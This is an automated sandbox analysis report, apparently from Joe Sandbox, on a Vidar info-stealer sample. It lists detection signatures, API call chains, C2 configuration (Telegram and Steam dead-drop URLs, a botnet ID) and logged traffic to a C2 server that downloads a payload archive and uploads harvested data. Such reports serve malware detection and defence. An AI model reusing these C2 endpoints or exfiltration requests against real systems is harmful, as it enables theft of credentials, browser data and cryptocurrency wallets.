Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 1301138
MD5: bf81661814944b92da689f1c461ef908
SHA1: 7e3235d7ce69217063f53840e6337633cc721ec7
SHA256: a524fce6eb4ee25ed07de294220d9c2445090b6c18b48802219149162152fea1
Tags: exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Vidar stealer
Detected unpacking (changes PE section rights)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses known network protocols on non-standard ports
Searches for specific processes (likely to inject)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection

Source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199545993403", "https://t.me/vogogor"], "Botnet": "b2ced91faf30889899f34458f95b8e93", "Version": "5.4"}
Source: file.exe ReversingLabs: Detection: 65%
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004158A0 CryptUnprotectData,LocalAlloc,_memmove,LocalFree, 1_2_004158A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040AA30 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA, 1_2_0040AA30
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00415600 _memset,lstrlen,CryptStringToBinaryA,_memmove,lstrcat,lstrcat, 1_2_00415600
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00415820 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_00415820

Compliance

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49773 version: TLS 1.2
Source: Binary string: freebl3.pdb source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source: Binary string: mozglue.pdbP source: mozglue.dll.1.dr
Source: Binary string: freebl3.pdbp source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source: Binary string: nss3.pdb@ source: nss3.dll.1.dr
Source: Binary string: C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe
Source: Binary string: softokn3.pdb@ source: softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: 1C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe
Source: Binary string: nss3.pdb source: nss3.dll.1.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.1.dr
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412170 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412170
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004171C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA, 1_2_004171C0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412450
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412690
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041B7E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0041B7E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040C8E0 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0040C8E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00424960 FindFirstFileW,FindNextFileW,FindNextFileW, 1_2_00424960
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004169A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_004169A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040AAC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_0040AAC0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00416BB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00416BB0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040DE60 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 1_2_0040DE60
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\

Networking

Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 6012
Source: unknown Network traffic detected: HTTP traffic on port 6012 -> 49774
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199545993403
Source: Malware configuration extractor URLs: https://t.me/vogogor
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: global traffic HTTP traffic detected: GET /vogogor HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET /b2ced91faf30889899f34458f95b8e93 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012
Source: global traffic HTTP traffic detected: GET /sp1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4389493767942367User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012Content-Length: 126637Connection: Keep-AliveCache-Control: no-cache
Source: global traffic TCP traffic: 192.168.2.8:49774 -> 195.201.254.123:6012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 31 Aug 2023 14:50:49 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytes
Source: unknown TCP traffic detected without corresponding DNS query: 195.201.254.123
Source: file.exe, 00000001.00000002.3729883026.0000000011376000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: .www.linkedin.comFALSE/FALSE1712164711bscookie"v=1&202204040740589e4e0288-8f83-439a-84f5-073fd989928dAQH-qUSHAeATZCYYPWnORXttTduQBnCi" equals www.linkedin.com (Linkedin)
Source: 98279768849475661070206458.1.dr String found in binary or memory: .www.linkedin.combscookie/0 equals www.linkedin.com (Linkedin)
Source: 98279768849475661070206458.1.dr String found in binary or memory: w.www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: file.exe, 00000001.00000002.3698626677.0000000002606000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/
Source: file.exe, 00000001.00000002.3698626677.0000000002606000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/0
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/Mu
Source: file.exe, 00000001.00000002.3707864447.0000000004670000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/b2ced91faf30889899f34458f95b8e93
Source: file.exe, 00000001.00000002.3707864447.0000000004670000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/b2ced91faf30889899f34458f95b8e93k
Source: file.exe, 00000001.00000002.3698626677.0000000002606000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/m
Source: file.exe, 00000001.00000002.3723888260.0000000004C90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/sCodecs.dlls
Source: file.exe, 00000001.00000002.3698626677.00000000025E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/sp1.zip
Source: file.exe, 00000001.00000002.3698626677.00000000025E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://195.201.254.123:6012/sp1.zipn)
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000001.00000002.3730836231.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 60379239670748708072323449.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exeD
Source: 60379239670748708072323449.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-stub/en-US/win/4b14f052f39ceffb32abd8
Source: 00440746450577075373182215.1.dr, 37707990510604932654966133.1.dr, 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 00440746450577075373182215.1.dr, 37707990510604932654966133.1.dr, 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 38345013959471306846242542.1.dr, 93702365600485792059963927.1.dr String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B27E81B29
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US&attribution_code=c291cmNlPXd3dy
Source: 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 00440746450577075373182215.1.dr, 37707990510604932654966133.1.dr, 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245807_df5ad55fdd604472a86a45a217032c7dM
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=15&ct=1690545750&rver=7.3.6960.0&wp=MBI_SSL&wre
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: https://mozilla.org0/
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u321-b07/df5ad55fdd604472a86a45a217032c7d/jre-8u321-wind
Source: file.exe, file.exe, 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199545993403
Source: file.exe, 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199545993403update.zip
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: 77364074545019038892817732.1.dr String found in binary or memory: https://support.mozilla.org
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogor
Source: file.exe, 00000001.00000002.3707864447.000000000464E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogorL
Source: file.exe, 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogorracvotsp1.zipMozilla/5.0
Source: file.exe, 00000001.00000002.3707864447.000000000464E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogorv
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogorx
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.zip
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.zipQ
Source: file.exe, 00000001.00000003.1536347021.0000000010EB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3729994076.000000001157C000.00000004.00000020.00020000.00000000.sdmp, 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/Sun
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 37707990510604932654966133.1.dr, 60379239670748708072323449.1.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/chrome/
Source: 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/chrome/Google
Source: file.exe, 00000001.00000002.3730149645.000000001198E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1564532439.0000000010EB7000.00000004.00000020.00020000.00000000.sdmp, 38345013959471306846242542.1.dr, 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=1&installdataindex=empty&defaultbrowser=0
Source: 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=1&installdataindex=empty&defaultbrowser=0Google
Source: 60379239670748708072323449.1.dr String found in binary or memory: https://www.google.com/favicon.ico
Source: file.exe, 00000001.00000003.1565422518.0000000010EB7000.00000004.00000020.00020000.00000000.sdmp, 38345013959471306846242542.1.dr, 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/https://www.google.com/chrome/Thu
Source: 00440746450577075373182215.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=microsoft&oq=microsoft&gs_lcrp=EgZjaHJvbWUqEAgAEAAYgwEY4wIYsQMYgAQyE
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=microsoft&sourceid=chrome&ie=UTF-8microsoft
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=microsoft&sourceid=chrome&ie=UTF-8microsoftt
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0i131i433i512j0i512j0i131i433i512l2j0
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=test&sourceid=chrome&ie=UTF-8test
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dmicrosoft%26oq%3Dmic
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000001.00000003.1536347021.0000000010EB7000.00000004.00000020.00020000.00000000.sdmp, 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.mozilla.org/
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
